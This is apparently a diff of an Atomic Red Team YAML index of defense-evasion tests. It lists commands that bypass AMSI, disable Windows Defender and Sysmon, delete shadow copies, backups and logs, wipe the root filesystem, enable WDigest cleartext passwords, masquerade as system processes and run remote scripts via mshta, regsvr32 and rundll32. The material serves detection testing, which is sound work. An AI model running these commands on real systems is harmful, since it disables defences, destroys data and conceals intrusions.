cleanup_command: 'C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}"
/section:httplogging /dontLog:false
'
'
- name: Uninstall Sysmon
description: 'Uninstall Sysinternals Sysmon for Defense Evasion
'
'
supported_platforms:
- windows
input_arguments:
@@ -7138,10 +7138,10 @@ defense-evasion:
elevation_required: true
command: 'sysmon -u
'
'
cleanup_command: 'sysmon -i -accepteula
'
'
- name: AMSI Bypass - AMSI InitFailed
description: |
Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true.
@@ -7165,16 +7165,16 @@ defense-evasion:
command: 'Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}"
-Recurse
'
'
cleanup_command: 'New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers"
-Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}"
'
'
- name: Disable Arbitrary Security Windows Service
description: 'With administrative rights, an adversary can disable Windows Services
related to security products.
'
'
supported_platforms:
- windows
input_arguments:
@@ -7223,12 +7223,12 @@ defense-evasion:
elevation_required: false
command: '[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField(''amsiInitFailed'',''NonPublic,Static'').SetValue($null,$true)
'
'
- name: Tamper with Windows Defender ATP PowerShell
description: 'Attempting to disable scheduled scanning and other parts of windows
defender atp
'
'
supported_platforms:
- windows
executor:
@@ -7248,7 +7248,7 @@ defense-evasion:
description: 'Attempting to disable scheduled scanning and other parts of windows
defender atp
'
'
supported_platforms:
- windows
executor:
@@ -7264,7 +7264,7 @@ defense-evasion:
- name: Tamper with Windows Defender Registry
description: 'Disable Windows Defender from starting after a reboot
'
'
supported_platforms:
- windows
executor:
@@ -7273,11 +7273,11 @@ defense-evasion:
command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender"
-Name DisableAntiSpyware -Value 1
'
'
cleanup_command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows
Defender" -Name DisableAntiSpyware -Value 0
'
'
- name: Disable Microft Office Security Features
description: |
Gorgon group may disable Office security features so that their code can run
@@ -7311,7 +7311,7 @@ defense-evasion:
command: '"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions
-All
'
'
T1107:
technique:
x_mitre_data_sources:
@@ -7367,7 +7367,7 @@ defense-evasion:
- name: Delete a single file - Linux/macOS
description: 'Delete a single file from the temporary directory
'
'
supported_platforms:
- linux
- macos
@@ -7380,12 +7380,12 @@ defense-evasion:
name: sh
command: 'rm -f #{file_to_delete}
'
'
- name: Delete an entire folder - Linux/macOS
description: 'Recursively delete the temporary directory and all files contained
within it
'
'
supported_platforms:
- linux
- macos
@@ -7398,12 +7398,12 @@ defense-evasion:
name: sh
command: 'rm -rf #{folder_to_delete}
'
'
- name: Overwrite and delete a file with shred
description: 'Use the `shred` command to overwrite the temporary file and then
delete it
'
'
supported_platforms:
- linux
input_arguments:
@@ -7415,11 +7415,11 @@ defense-evasion:
name: sh
command: 'shred -u #{file_to_shred}
'
'
- name: Delete a single file - Windows cmd
description: 'Delete a single file from the temporary directory using cmd.exe
'
'
supported_platforms:
- windows
executor:
@@ -7432,7 +7432,7 @@ defense-evasion:
description: 'Recursively delete the temporary directory and all files contained
within it using cmd.exe
'
'
supported_platforms:
- windows
executor:
@@ -7444,7 +7444,7 @@ defense-evasion:
- name: Delete a single file - Windows PowerShell
description: 'Delete a single file from the temporary directory using Powershell
'
'
supported_platforms:
- windows
executor:
@@ -7457,7 +7457,7 @@ defense-evasion:
description: 'Recursively delete the temporary directory and all files contained
within it using Powershell
'
'
supported_platforms:
- windows
input_arguments:
@@ -7474,7 +7474,7 @@ defense-evasion:
- name: Delete VSS - vssadmin
description: 'Delete all volume shadow copies with vssadmin.exe
'
'
supported_platforms:
- windows
executor:
@@ -7482,11 +7482,11 @@ defense-evasion:
elevation_required: true
command: 'vssadmin.exe Delete Shadows /All /Quiet
'
'
- name: Delete VSS - wmic
description: 'Delete all volume shadow copies with wmic
'
'
supported_platforms:
- windows
executor:
@@ -7494,11 +7494,11 @@ defense-evasion:
elevation_required: true
command: 'wmic shadowcopy delete
'
'
- name: bcdedit
description: 'This test leverages `bcdedit` to remove boot-time recovery measures.
'
'
supported_platforms:
- windows
executor:
@@ -7510,7 +7510,7 @@ defense-evasion:
- name: wbadmin
description: 'This test deletes Windows Backup catalogs.
'
'
supported_platforms:
- windows
executor:
@@ -7518,25 +7518,25 @@ defense-evasion:
elevation_required: true
command: 'wbadmin delete catalog -quiet
'
'
- name: Delete Filesystem - Linux
description: 'This test deletes the entire root filesystem of a Linux system.
This technique was used by Amnesia IoT malware to avoid analysis. This test
is dangerous and destructive, do NOT use on production equipment.
'
'
supported_platforms:
- linux
executor:
name: bash
command: 'rm -rf / --no-preserve-root > /dev/null 2> /dev/null
'
'
- name: Delete-PrefetchFile
description: 'Delete a single prefetch file. Deletion of prefetch files is
a known anti-forensic technique.
'
'
supported_platforms:
- windows
executor:
@@ -7545,7 +7545,7 @@ defense-evasion:
command: 'Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem
-Path "$Env:SystemRoot\prefetch\*.pf" -Name)[0])
'
'
- name: Delete TeamViewer Log Files
description: |
Adversaries may delete TeamViewer log files to hide activity. This should provide a high true-positive alert ration.
@@ -7664,7 +7664,7 @@ defense-evasion:
description: 'Modifies the filesystem permissions of the specified file or folder
to take ownership of the object.
'
'
supported_platforms:
- windows
input_arguments:
@@ -7676,12 +7676,12 @@ defense-evasion:
name: command_prompt
command: 'takeown.exe /f #{file_folder_to_own}
'
'
- name: Take ownership recursively using takeown utility
description: 'Modifies the filesystem permissions of the specified folder to
take ownership of it and its contents.
'
'
supported_platforms:
- windows
input_arguments:
@@ -7693,12 +7693,12 @@ defense-evasion:
name: command_prompt
command: 'takeown.exe /f #{folder_to_own} /r
'
'
- name: cacls - Grant permission to specified user or group
description: 'Modifies the filesystem permissions of the specified file or folder
to allow the specified user or group Full Control.
'
'
supported_platforms:
- windows
input_arguments:
@@ -7714,12 +7714,12 @@ defense-evasion:
name: command_prompt
command: 'cacls.exe #{file_or_folder} /grant #{user_or_group}:F
'
'
- name: cacls - Grant permission to specified user or group recursively
description: 'Modifies the filesystem permissions of the specified folder and
contents to allow the specified user or group Full Control.
'
'
supported_platforms:
- windows
input_arguments:
@@ -7735,12 +7735,12 @@ defense-evasion:
name: command_prompt
command: 'cacls.exe #{file_or_folder} /grant #{user_or_group}:F /t
'
'
- name: icacls - Grant permission to specified user or group
description: 'Modifies the filesystem permissions of the specified file or folder
to allow the specified user or group Full Control.
'
'
supported_platforms:
- windows
input_arguments:
@@ -7756,12 +7756,12 @@ defense-evasion:
name: command_prompt
command: 'icacls.exe #{file_or_folder} /grant #{user_or_group}:F
'
'
- name: icacls - Grant permission to specified user or group recursively
description: 'Modifies the filesystem permissions of the specified folder and
contents to allow the specified user or group Full Control.
'
'
supported_platforms:
- windows
input_arguments:
@@ -7777,12 +7777,12 @@ defense-evasion:
name: command_prompt
command: 'icacls.exe #{file_or_folder} /grant #{user_or_group}:F /t
'
'
- name: attrib - Remove read-only attribute
description: 'Removes the read-only attribute from a file or folder using the
attrib.exe command.
'
'
supported_platforms:
- windows
input_arguments:
@@ -7794,12 +7794,12 @@ defense-evasion:
name: command_prompt
command: 'attrib.exe -r #{file_or_folder}
'
'
- name: chmod - Change file or folder mode (numeric mode)
description: 'Changes a file or folder''s permissions using chmod and a specified
numeric mode.
'
'
supported_platforms:
- macos
- linux
@@ -7816,12 +7816,12 @@ defense-evasion:
name: bash
command: 'chmod #{numeric_mode} #{file_or_folder}
'
'
- name: chmod - Change file or folder mode (symbolic mode)
description: 'Changes a file or folder''s permissions using chmod and a specified
symbolic mode.
'
'
supported_platforms:
- macos
- linux
@@ -7838,12 +7838,12 @@ defense-evasion:
name: bash
command: 'chmod #{symbolic_mode} #{file_or_folder}
'
'
- name: chmod - Change file or folder mode (numeric mode) recursively
description: 'Changes a file or folder''s permissions recursively using chmod
and a specified numeric mode.
'
'
supported_platforms:
- macos
- linux
@@ -7860,12 +7860,12 @@ defense-evasion:
name: bash
command: 'chmod #{numeric_mode} #{file_or_folder} -R
'
'
- name: chmod - Change file or folder mode (symbolic mode) recursively
description: 'Changes a file or folder''s permissions recursively using chmod
and a specified symbolic mode.
'
'
supported_platforms:
- macos
- linux
@@ -7882,12 +7882,12 @@ defense-evasion:
name: bash
command: 'chmod #{symbolic_mode} #{file_or_folder} -R
'
'
- name: chown - Change file or folder ownership and group
description: 'Changes a file or folder''s ownership and group information using
chown.
'
'
supported_platforms:
- macos
- linux
@@ -7908,12 +7908,12 @@ defense-evasion:
name: bash
command: 'chown #{owner}:#{group} #{file_or_folder}
'
'
- name: chown - Change file or folder ownership and group recursively
description: 'Changes a file or folder''s ownership and group information recursively
using chown.
'
'
supported_platforms:
- macos
- linux
@@ -7934,11 +7934,11 @@ defense-evasion:
name: bash
command: 'chown #{owner}:#{group} #{file_or_folder} -R
'
'
- name: chown - Change file or folder mode ownership only
description: 'Changes a file or folder''s ownership only using chown.
'
'
supported_platforms:
- macos
- linux
@@ -7955,11 +7955,11 @@ defense-evasion:
name: bash
command: 'chown #{owner} #{file_or_folder}
'
'
- name: chown - Change file or folder ownership recursively
description: 'Changes a file or folder''s ownership only recursively using chown.
'
'
supported_platforms:
- macos
- linux
@@ -7976,7 +7976,7 @@ defense-evasion:
name: bash
command: 'chown #{owner} #{file_or_folder} -R
'
'
- name: chattr - Remove immutable file attribute
description: |
Remove's a file's `immutable` attribute using `chattr`.
@@ -7993,7 +7993,7 @@ defense-evasion:
name: sh
command: 'chattr -i #{file_to_modify}
'
'
T1144:
technique:
x_mitre_permissions_required:
@@ -8072,7 +8072,7 @@ defense-evasion:
- name: Gatekeeper Bypass
description: 'Gatekeeper Bypass via command line
'
'
supported_platforms:
- macos
input_arguments:
@@ -8136,7 +8136,7 @@ defense-evasion:
- name: Disable history collection
description: 'Disables history collection in shells
'
'
supported_platforms:
- linux
- macos
@@ -8231,7 +8231,7 @@ defense-evasion:
- name: Create a hidden file in a hidden directory
description: 'Creates a hidden file inside a hidden directory
'
'
supported_platforms:
- linux
- macos
@@ -8243,11 +8243,11 @@ defense-evasion:
echo "T1158" > /var/tmp/.hidden-directory/.hidden-file
cleanup_command: 'rm -rf /var/tmp/.hidden-directory/
'
'
- name: Mac Hidden file
description: 'Hide a file on MacOS
'
'
supported_platforms:
- macos
executor:
@@ -8256,12 +8256,12 @@ defense-evasion:
command: 'xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00
40 00 FF FF FF FF 00 00"
'
'
- name: Create Windows System File with Attrib
description: 'Creates a file and marks it as a system file using the attrib.exe
utility.
'
'
supported_platforms:
- windows
executor:
@@ -8272,11 +8272,11 @@ defense-evasion:
attrib.exe +s %TEMP%\T1158.txt
cleanup_command: 'del /A:S %TEMP%\T1158.txt >nul 2>&1
'
'
- name: Create Windows Hidden File with Attrib
description: 'Creates a file and marks it as hidden using the attrib.exe utility.
'
'
supported_platforms:
- windows
executor:
@@ -8287,11 +8287,11 @@ defense-evasion:
attrib.exe +h %TEMP%\T1158_hidden.txt
cleanup_command: 'del /A:H %TEMP%\T1158_hidden.txt >nul 2>&1
'
'
- name: Hidden files
description: 'Requires Apple Dev Tools
'
'
supported_platforms:
- macos
input_arguments:
@@ -8304,11 +8304,11 @@ defense-evasion:
elevation_required: false
command: 'setfile -a V #{filename}
'
'
- name: Hide a Directory
description: 'Hide a directory on MacOS
'
'
supported_platforms:
- macos
executor:
@@ -8319,11 +8319,11 @@ defense-evasion:
chflags hidden /var/tmp/T1158_mac.txt
cleanup_command: 'rm /var/tmp/T1158_mac.txt
'
'
- name: Show all hidden files
description: 'Show all hidden files on MacOS
'
'
supported_platforms:
- macos
executor:
@@ -8331,15 +8331,15 @@ defense-evasion:
elevation_required: false
command: 'defaults write com.apple.finder AppleShowAllFiles YES
'
'
cleanup_command: 'defaults write com.apple.finder AppleShowAllFiles NO
'
'
- name: Create ADS command prompt
description: 'Create an Alternate Data Stream with the command prompt. Write
access is required.
'
'
supported_platforms:
- windows
input_arguments:
@@ -8357,15 +8357,15 @@ defense-evasion:
command: |
echo "Normal Text." > #{file_name}
echo cmd /c echo "Shell code execution."> #{file_name}:#{ads_filename}
for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i
for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i
cleanup_command: 'del #{file_name} >nul 2>&1
'
'
- name: Create ADS PowerShell
description: 'Create an Alternate Data Stream with PowerShell. Write access
is required.
'
'
supported_platforms:
- windows
input_arguments:
@@ -8387,7 +8387,7 @@ defense-evasion:
ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname
cleanup_command: 'Remove-Item -Path #{file_name} -ErrorAction Ignore
'
'
T1147:
technique:
x_mitre_data_sources:
@@ -8435,7 +8435,7 @@ defense-evasion:
- name: Hidden Users
description: 'Add a hidden user on MacOS
'
'
supported_platforms:
- macos
input_arguments:
@@ -8447,7 +8447,7 @@ defense-evasion:
name: sh
command: 'sudo dscl . -create /Users/#{user_name} UniqueID 333
'
'
T1143:
technique:
x_mitre_permissions_required:
@@ -8507,7 +8507,7 @@ defense-evasion:
description: 'Launch PowerShell with the "-WindowStyle Hidden" argument to conceal
PowerShell windows by setting the WindowStyle parameter to hidden.
'
'
supported_platforms:
- windows
input_arguments:
@@ -8524,7 +8524,7 @@ defense-evasion:
elevation_required: false
command: 'Start-Process #{powershell_command}
'
'
T1183:
technique:
x_mitre_data_sources:
@@ -8614,7 +8614,7 @@ defense-evasion:
- name: IFEO Add Debugger
description: 'Leverage Global Flags Settings
'
'
supported_platforms:
- windows
input_arguments:
@@ -8632,15 +8632,15 @@ defense-evasion:
command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
'
'
cleanup_command: 'reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_binary}" /v Debugger /f
'
'
- name: IFEO Global Flags
description: 'Leverage Global Flags Settings
'
'
supported_platforms:
- windows
input_arguments:
@@ -8744,7 +8744,7 @@ defense-evasion:
- name: Clear Logs
description: 'Clear Windows Event Logs
'
'
supported_platforms:
- windows
input_arguments:
@@ -8757,12 +8757,12 @@ defense-evasion:
elevation_required: true
command: 'wevtutil cl #{log_name}
'
'
- name: FSUtil
description: 'Manages the update sequence number (USN) change journal, which
provides a persistent log of all changes made to files on the volume.
'
'
supported_platforms:
- windows
executor:
@@ -8770,11 +8770,11 @@ defense-evasion:
elevation_required: true
command: 'fsutil usn deletejournal /D C:
'
'
- name: rm -rf
description: 'Delete system and audit logs
'
'
supported_platforms:
- macos
- linux
@@ -8788,7 +8788,7 @@ defense-evasion:
This technique was used by threat actor Rocke during the exploitation of Linux
web servers.
'
'
supported_platforms:
- linux
input_arguments:
@@ -8800,12 +8800,12 @@ defense-evasion:
name: bash
command: 'echo 0> /var/spool/mail/#{username}
'
'
- name: Overwrite Linux Log
description: 'This test overwrites the specified log. This technique was used
by threat actor Rocke during the exploitation of Linux web servers.
'
'
supported_platforms:
- linux
input_arguments:
@@ -8817,12 +8817,12 @@ defense-evasion:
name: bash
command: 'echo 0> #{log_path}
'
'
- name: Delete System Logs Using PowerShell
description: 'Recommended Detection: Monitor for use of the windows event log
filepath in PowerShell couple with delete arguments
'
'
supported_platforms:
- windows
executor:
@@ -8834,11 +8834,11 @@ defense-evasion:
Remove-Item C:\Windows\System32\winevt\Logs\Security.evtx
cleanup_command: 'Start-Service -Name EventLog
'
'
- name: Delete System Logs Using Clear-EventLogId
description: 'Clear event logs using built-in PowerShell commands
'
'
supported_platforms:
- windows
executor:
@@ -8846,7 +8846,7 @@ defense-evasion:
elevation_required: true
command: 'Clear-EventLog -logname Application
'
'
T1202:
technique:
x_mitre_data_sources:
@@ -9042,7 +9042,7 @@ defense-evasion:
- name: Install root CA on CentOS/RHEL
description: 'Creates a root CA with openssl
'
'
supported_platforms:
- linux
input_arguments:
@@ -9124,7 +9124,7 @@ defense-evasion:
description: 'Executes the CheckIfInstallable class constructor runner instead
of executing InstallUtil.
'
'
supported_platforms:
- windows
input_arguments:
@@ -9190,7 +9190,7 @@ defense-evasion:
description: 'Executes the InstallHelper class constructor runner instead of
executing InstallUtil.
'
'
supported_platforms:
- windows
input_arguments:
@@ -9257,7 +9257,7 @@ defense-evasion:
- name: InstallUtil class constructor method call
description: 'Executes the installer assembly class constructor.
'
'
supported_platforms:
- windows
input_arguments:
@@ -9324,7 +9324,7 @@ defense-evasion:
- name: InstallUtil Install method call
description: 'Executes the Install Method
'
'
supported_platforms:
- windows
input_arguments:
@@ -9391,7 +9391,7 @@ defense-evasion:
- name: InstallUtil Uninstall method call - /U variant
description: 'Executes the Uninstall Method
'
'
supported_platforms:
- windows
input_arguments:
@@ -9459,7 +9459,7 @@ defense-evasion:
variant
description: 'Executes the Uninstall Method
'
'
supported_platforms:
- windows
input_arguments:
@@ -9526,7 +9526,7 @@ defense-evasion:
- name: InstallUtil HelpText method call
description: 'Executes the Uninstall Method
'
'
supported_platforms:
- windows
input_arguments:
@@ -9594,7 +9594,7 @@ defense-evasion:
description: 'Executes an InstallUtil assembly by renaming InstallUtil.exe and
using a nonstandard extension for the assembly.
'
'
supported_platforms:
- windows
input_arguments:
@@ -9711,14 +9711,14 @@ defense-evasion:
- name: Launchctl
description: 'Utilize launchctl
'
'
supported_platforms:
- macos
executor:
name: sh
command: 'launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator
'
'
T1036:
technique:
x_mitre_data_sources:
@@ -9833,7 +9833,7 @@ defense-evasion:
description: 'Copies cmd.exe, renames it, and launches it to masquerade as an
instance of lsass.exe.
'
'
supported_platforms:
- windows
executor:
@@ -9844,12 +9844,12 @@ defense-evasion:
cmd.exe /c %SystemRoot%\Temp\lsass.exe
cleanup_command: 'del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1
'
'
- name: Masquerading as Linux crond process.
description: 'Copies sh process, renames it as crond, and executes it to masquerade
as the cron daemon.
'
'
supported_platforms:
- linux
executor:
@@ -9862,7 +9862,7 @@ defense-evasion:
description: 'Copies cscript.exe, renames it, and launches it to masquerade
as an instance of notepad.exe.
'
'
supported_platforms:
- windows
executor:
@@ -9873,12 +9873,12 @@ defense-evasion:
cmd.exe /c %APPDATA%\notepad.exe /B
cleanup_command: 'del /Q /F %APPDATA%\notepad.exe >nul 2>&1
'
'
- name: Masquerading - wscript.exe running as svchost.exe
description: 'Copies wscript.exe, renames it, and launches it to masquerade
as an instance of svchost.exe.
'
'
supported_platforms:
- windows
executor:
@@ -9889,12 +9889,12 @@ defense-evasion:
cmd.exe /c %APPDATA%\svchost.exe /B
cleanup_command: 'del /Q /F %APPDATA%\svchost.exe >nul 2>&1
'
'
- name: Masquerading - powershell.exe running as taskhostw.exe
description: 'Copies powershell.exe, renames it, and launches it to masquerade
as an instance of taskhostw.exe.
'
'
supported_platforms:
- windows
executor:
@@ -9905,12 +9905,12 @@ defense-evasion:
cmd.exe /K %APPDATA%\taskhostw.exe
cleanup_command: 'del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1
'
'
- name: Masquerading - non-windows exe running as windows exe
description: 'Copies an exe, renames it as a windows exe, and launches it to
masquerade as a real windows exe
'
'
supported_platforms:
- windows
input_arguments:
@@ -9938,12 +9938,12 @@ defense-evasion:
Stop-Process -ID $myT1036
cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore
'
'
- name: Masquerading - windows exe running as different windows exe
description: 'Copies a windows exe, renames it as another windows exe, and launches
it to masquerade as second windows exe
'
'
supported_platforms:
- windows
input_arguments:
@@ -9964,7 +9964,7 @@ defense-evasion:
Stop-Process -ID $myT1036
cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore
'
'
- name: Malicious process Masquerading as LSM.exe
description: |
Detect LSM running from an incorrect directory and an incorrect service account
@@ -10066,7 +10066,7 @@ defense-evasion:
description: 'Modify the registry of the currently logged in user using reg.exe
cia cmd console
'
'
supported_platforms:
- windows
executor:
@@ -10075,11 +10075,11 @@ defense-evasion:
command: 'reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
/t REG_DWORD /v HideFileExt /d 1 /f
'
'
cleanup_command: 'reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
/v HideFileExt /f
'
'
- name: Modify Registry of Local Machine - cmd
description: |
Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup. This should only be possible when
@@ -10092,16 +10092,16 @@ defense-evasion:
command: 'reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
/t REG_EXPAND_SZ /v SecurityHealth /d {some_other_executable} /f
'
'
cleanup_command: 'reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
/v SecurityHealth /f
'
'
- name: Modify Registry of Another User Profile
description: 'Modify a registry key of each user profile not currently loaded
on the machine using both powershell and cmd line tools.
'
'
supported_platforms:
- windows
executor:
@@ -10164,7 +10164,7 @@ defense-evasion:
description: 'Sets registry key that will tell windows to store plaintext passwords
(making the system vulnerable to clear text / cleartext password dumping)
'
'
supported_platforms:
- windows
executor:
@@ -10173,16 +10173,16 @@ defense-evasion:
command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
/v UseLogonCredential /t REG_DWORD /d 1 /f
'
'
cleanup_command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
/v UseLogonCredential /t REG_DWORD /d 0 /f
'
'
- name: Modify registry to store PowerShell code
description: 'Sets Windows Registry key containing base64-encoded PowerShell
code.
'
'
supported_platforms:
- windows
input_arguments:
@@ -10210,7 +10210,7 @@ defense-evasion:
cleanup_command: 'Remove-ItemProperty -Force -Path #{registry_key_storage}
-Name #{registry_entry_storage} -ErrorAction Ignore
'
'
- name: Add domain to Trusted sites Zone
description: |
Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over office365 as described here:
@@ -10233,7 +10233,7 @@ defense-evasion:
- name: Javascript in registry
description: 'placing javascript in registry for persistence
'
'
supported_platforms:
- windows
executor:
@@ -10242,7 +10242,7 @@ defense-evasion:
command: 'New-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet
Settings" -Name T1112 -Value "<script>"
'
'
cleanup_command: Remove-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet
Settings" -Name T1112 -ErrorAction Ignore
T1170:
@@ -10336,7 +10336,7 @@ defense-evasion:
- name: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject
description: 'Test execution of a remote script using mshta.exe
'
'
supported_platforms:
- windows
input_arguments:
@@ -10363,7 +10363,7 @@ defense-evasion:
name: command_prompt
command: 'mshta.exe vbscript:Execute("CreateObject(""Wscript.Shell"").Run(""{local_file_path}"")(window.close)")
'
'
- name: Mshta executes VBScript to execute malicious command
description: |
Run a local VB script to run local user enumeration powershell command
@@ -10376,11 +10376,11 @@ defense-evasion:
command: 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell
-noexit -file $PathToAtomicsFolder\T1170\src\powershell.ps1"":close")
'
'
- name: Mshta Executes Remote HTML Application (HTA)
description: 'Execute an arbitrary remote HTA.
'
'
supported_platforms:
- windows
input_arguments:
@@ -10400,7 +10400,7 @@ defense-evasion:
mshta "#{temp_file}"
cleanup_command: 'remove-item "#{temp_file}" -ErrorAction Ignore
'
'
T1096:
technique:
x_mitre_data_sources:
@@ -10515,7 +10515,7 @@ defense-evasion:
description: 'Storing files in Alternate Data Stream (ADS) similar to Astaroth
malware.
'
'
supported_platforms:
- windows
input_arguments:
@@ -10596,7 +10596,7 @@ defense-evasion:
- name: Add Network Share
description: 'Add a Network Share utilizing the command_prompt
'
'
supported_platforms:
- windows
input_arguments:
@@ -10613,7 +10613,7 @@ defense-evasion:
- name: Remove Network Share
description: 'Removes a Network Share utilizing the command_prompt
'
'
supported_platforms:
- windows
input_arguments:
@@ -10626,11 +10626,11 @@ defense-evasion:
elevation_required: false
command: 'net share #{share_name} /delete
'
'
- name: Remove Network Share PowerShell
description: 'Removes a Network Share utilizing PowerShell
'
'
supported_platforms:
- windows
input_arguments:
@@ -10757,7 +10757,7 @@ defense-evasion:
description: 'Creates a base64-encoded data file and decodes it into an executable
shell script
'
'
supported_platforms:
- macos
- linux
@@ -10773,7 +10773,7 @@ defense-evasion:
description: 'Creates base64-encoded PowerShell code and executes it. This is
used by numerous adversaries and malicious tools.
'
'
supported_platforms:
- windows
input_arguments:
@@ -10796,7 +10796,7 @@ defense-evasion:
and deobfuscates it for execution. This is used by numerous adversaries and
malicious tools.
'
'
supported_platforms:
- windows
input_arguments:
@@ -11003,7 +11003,7 @@ defense-evasion:
- name: Plist Modification
description: 'Modify MacOS plist file in one of two directories
'
'
supported_platforms:
- macos
executor:
@@ -11257,7 +11257,7 @@ defense-evasion:
- name: Process Injection via mavinject.exe
description: 'Windows 10 Utility To Inject DLLS
'
'
supported_platforms:
- windows
input_arguments:
@@ -11285,7 +11285,7 @@ defense-evasion:
- name: Process Injection via PowerSploit
description: 'PowerShell Injection using [PowerSploit Invoke-DLLInjection](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-DllInjection.ps1)
'
'
supported_platforms:
- windows
input_arguments:
@@ -11320,13 +11320,13 @@ defense-evasion:
elevation_required: true
command: 'echo #{path_to_shared_library} > /etc/ld.so.preload
'
'
- name: Shared Library Injection via LD_PRELOAD
description: 'This test injects a shared object library via the LD_PRELOAD environment
variable to execute. This technique was used by threat actor Rocke during
the exploitation of Linux web servers. This requires the `glibc` package.
'
'
supported_platforms:
- linux
input_arguments:
@@ -11339,7 +11339,7 @@ defense-evasion:
elevation_required: false
command: 'LD_PRELOAD=#{path_to_shared_library} ls
'
'
- name: Process Injection via C#
description: |
Process Injection using C#
@@ -11438,7 +11438,7 @@ defense-evasion:
- name: Regasm Uninstall Method Call Test
description: 'Executes the Uninstall Method, No Admin Rights Required
'
'
supported_platforms:
- windows
input_arguments:
@@ -11466,12 +11466,12 @@ defense-evasion:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{output_file}
cleanup_command: 'del #{output_file} >nul 2>&1
'
'
- name: Regsvs Uninstall Method Call Test
description: 'Executes the Uninstall Method, No Admin Rights Required, Requires
SNK
'
'
supported_platforms:
- windows
input_arguments:
@@ -11579,7 +11579,7 @@ defense-evasion:
description: 'Regsvr32.exe is a command-line program used to register and unregister
OLE controls
'
'
supported_platforms:
- windows
input_arguments:
@@ -11599,12 +11599,12 @@ defense-evasion:
elevation_required: false
command: 'regsvr32.exe /s /u /i:#{filename} scrobj.dll
'
'
- name: Regsvr32 remote COM scriptlet execution
description: 'Regsvr32.exe is a command-line program used to register and unregister
OLE controls
'
'
supported_platforms:
- windows
input_arguments:
@@ -11617,12 +11617,12 @@ defense-evasion:
elevation_required: false
command: 'regsvr32.exe /s /u /i:#{url} scrobj.dll
'
'
- name: Regsvr32 local DLL execution
description: 'Regsvr32.exe is a command-line program used to register and unregister
OLE controls
'
'
supported_platforms:
- windows
input_arguments:
@@ -11644,7 +11644,7 @@ defense-evasion:
command: '"IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe
/s #{dll_name}) ELSE ( regsvr32.exe /s #{dll_name} )"
'
'
T1014:
technique:
x_mitre_data_sources:
@@ -11715,7 +11715,7 @@ defense-evasion:
- name: Loadable Kernel Module based Rootkit
description: 'Loadable Kernel Module based Rootkit
'
'
supported_platforms:
- linux
input_arguments:
@@ -11727,11 +11727,11 @@ defense-evasion:
name: sh
command: 'sudo insmod #{rootkit_file}
'
'
- name: Loadable Kernel Module based Rootkit
description: 'Loadable Kernel Module based Rootkit
'
'
supported_platforms:
- linux
input_arguments:
@@ -11743,7 +11743,7 @@ defense-evasion:
name: sh
command: 'sudo modprobe #{rootkit_file}
'
'
- name: Windows Signed Driver Rootkit Test
description: |
This test exploits a signed driver to execute code in Kernel.
@@ -11765,7 +11765,7 @@ defense-evasion:
name: command_prompt
command: 'puppetstrings #{driver_path}
'
'
T1085:
technique:
x_mitre_data_sources:
@@ -11828,7 +11828,7 @@ defense-evasion:
- name: Rundll32 execute JavaScript Remote Payload With GetObject
description: 'Test execution of a remote script using rundll32.exe
'
'
supported_platforms:
- windows
input_arguments:
@@ -11841,7 +11841,7 @@ defense-evasion:
elevation_required: false
command: 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();
'
'
- name: Rundll32 execute VBscript command
description: |
Test execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test.
@@ -11859,7 +11859,7 @@ defense-evasion:
elevation_required: false
command: 'rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0)
'
'
- name: Rundll32 advpack.dll Execution
description: |
Test execution of a command using rundll32.exe with advpack.dll.
@@ -11884,7 +11884,7 @@ defense-evasion:
elevation_required: false
command: 'rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,
'
'
- name: Rundll32 ieadvpack.dll Execution
description: |
Test execution of a command using rundll32.exe with ieadvpack.dll.
